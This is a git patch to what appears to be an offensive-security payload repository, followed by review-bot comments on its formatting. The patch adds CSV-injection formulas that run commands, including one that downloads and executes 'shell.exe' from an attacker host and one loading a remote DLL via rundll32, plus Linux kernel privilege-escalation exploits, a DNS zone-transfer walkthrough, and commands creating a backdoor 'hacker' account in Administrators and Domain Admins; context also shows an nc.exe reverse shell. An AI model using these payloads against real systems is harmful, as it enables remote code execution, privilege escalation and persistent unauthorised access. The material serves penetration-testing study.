From 5d4f65720a9dffe82d4850ac98f5ad1581a4658a Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 20:53:41 +0200 Subject: [PATCH] PrivEsc - Common Exploits --- CSV Injection/README.md | 8 ++++ .../Linux - Privilege Escalation.md | 44 +++++++++++++++++++ .../Methodology and enumeration.md | 12 +++++ .../Windows - Privilege Escalation.md | 1 - .../Windows - Using credentials.md | 3 +- 5 files changed, 66 insertions(+), 2 deletions(-) diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 126105d6..5261b09c 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -7,10 +7,18 @@ Many web applications allow the user to download content such as templates for i Basic exploit with Dynamic Data Exchange ```powershell +# pop a calc DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 + +# pop a notepad =cmd|' /C notepad'!'A1' + +# powershell download and execute =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 + +# msf smb delivery with rundll32 +=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 ``` Technical Details of the above payload: diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 36820bcc..09af954d 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -43,6 +43,11 @@ * [Groups](#groups) * [Docker](#docker) * [LXC/LXD](#lxclxd) +* [Common Exploits](#common-exploits) + * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) + * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds) + * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson) + * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper) ## Checklists 
@@ -537,6 +542,45 @@ lxc exec mycontainer /bin/sh Alternatively https://github.com/initstring/lxd_root + +## Common Exploits + +### CVE-2016-5195 (DirtyCow) + +Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 + +```powershell +# make dirtycow stable +echo 0 > /proc/sys/vm/dirty_writeback_centisecs +g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil +https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs +``` + +### CVE-2010-3904 (RDS) + +Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 + +```powershell +https://www.exploit-db.com/exploits/15285/ +``` + +### CVE-2010-4258 (Full Nelson) + +Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) + +```powershell +https://www.exploit-db.com/exploits/15704/ +``` + +### CVE-2012-0056 (Mempodipper) + +Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) + +```powershell +https://www.exploit-db.com/exploits/18411 +``` + + ## References - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) diff --git a/Methodology and Resources/Methodology and enumeration.md b/Methodology and Resources/Methodology and enumeration.md index 65cd22d2..8270db14 100644 --- a/Methodology and Resources/Methodology and enumeration.md +++ b/Methodology and Resources/Methodology and enumeration.md @@ -176,6 +176,18 @@ masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 index: 0x8 Account: root Name: root Desc: (null) ``` +* Zone Transfer + + ```powershell + host -t ns domain.local + domain.local name server master.domain.local. + + host master.domain.local + master.domain.local has address 192.168.1.1 + + dig axfr domain.local @192.168.1.1 + ``` + ## List all the subdirectories and files * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code. 
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 5e820c0a..87852a24 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -603,7 +603,6 @@ $ computer = "" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` - ## EoP - Common Vulnerabilities and Exposure ### Token Impersonation (RottenPotato) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 0234bbbb..17f22cf5 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -5,7 +5,8 @@ ```powershell net user hacker hacker1234* /add net localgroup administrators hacker /add -net localgroup "Remote Desktop Users" hacker /add +net localgroup "Remote Desktop Users" hacker /add # RDP access +net localgroup "Backup Operators" hacker /add # Full access to files net group "Domain Admins" hacker /add /domain ```
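Review bot: the new `=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1` line in the CSV Injection hunk carries an unlabelled address and share path; state that `10.0.0.1` and `\3\2\1.dll` are placeholders for the reader's own listener, as the `attacker_server` line just above it already does. The unchanged context line `Technical Details of the above payload:` still describes only the original DDE line, so either extend that section to cover the three added variants (notepad, `IEX(wget ...)`, `rundll32`) or reword it so it does not promise details for all of them. Minor: the fence is tagged `powershell` while its contents are spreadsheet formulas; an untagged fence would be more honest to a reader copying it.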
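Review bot: the four table-of-contents entries added to `Linux - Privilege Escalation.md` will not resolve. `(#[CVE-2010-3904-rds)` has a stray `[`, and GitHub lowercases generated heading ids, so the mixed-case anchors must follow the existing entries such as `#lxclxd`:
`* [CVE-2016-5195 (DirtyCow)](#cve-2016-5195-dirtycow)`
`* [CVE-2010-3904 (RDS)](#cve-2010-3904-rds)`
and likewise `#cve-2010-4258-full-nelson` and `#cve-2012-0056-mempodipper`.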
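Review bot: the `## Common Exploits` hunk mixes a shell command, a compile command and a bare wiki URL inside one `powershell` fence; `echo 0 > /proc/sys/vm/dirty_writeback_centisecs` and the `g++ ... 40847.cpp` line are bash, and the URL is not a command at all. Split it into a `bash` fence for the two commands and a markdown link for `https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs`, and say what `40847.cpp` is, since the hunk references the file without introducing it. The three following sections each consist of a lone exploit-db URL inside a fence; as plain links they would render as clickable and could also be listed under the `## References` heading that immediately follows. The version strings given (`<= 3.19.0-73.8`, `<= 2.6.36-rc8`, `2.6.39 < 3.2.2`) mix distribution package versions with upstream kernel versions; naming the distribution each range applies to, or adding the upstream fixed release, would let a defender use the section to verify that a host is patched.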
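Review bot: the new `Zone Transfer` block in `Methodology and enumeration.md` interleaves commands (`host -t ns domain.local`, `host master.domain.local`, `dig axfr domain.local @192.168.1.1`) with their sample output (`domain.local name server master.domain.local.`, `master.domain.local has address 192.168.1.1`) with nothing to tell them apart, so a reader copying the block will paste output as commands. Prefix the commands with a `$ ` prompt or move the output into `#` comments, and tag the fence `bash` rather than `powershell`, since `host` and `dig` are Unix tools. A short line noting that `domain.local` and `192.168.1.1` are sample values, and that an authoritative server answering `axfr` for arbitrary clients is a misconfiguration worth reporting, would make the entry useful on both sides of an assessment.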
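Review bot: the `Windows - Privilege Escalation.md` hunk only deletes the blank line between the closing fence and the `## EoP - Common Vulnerabilities and Exposure` heading. Elsewhere in this patch (the `## References` and `## Common Exploits` context in the Linux file) a `##` heading is preceded by a blank line, so restore it unless the removal is intentional; the commit message does not mention it.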
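Review bot: the comment `# Full access to files` on the new `net localgroup "Backup Operators" hacker /add` line is imprecise. Membership grants SeBackupPrivilege and SeRestorePrivilege, which let a process read or write any file regardless of its ACL only when it opens the file with backup semantics (for example `robocopy /B` or the backup API); saying so explains both why the group is sensitive and why defenders watch it as closely as `Administrators` (a local group addition is logged as event 4732). Also note that the trailing `# ...` comments are only valid because the fence is tagged `powershell`; in `cmd.exe` the `#` text would be passed to `net` as extra arguments and the command would fail, so either keep the comments on their own lines or state that the block is meant for a PowerShell prompt.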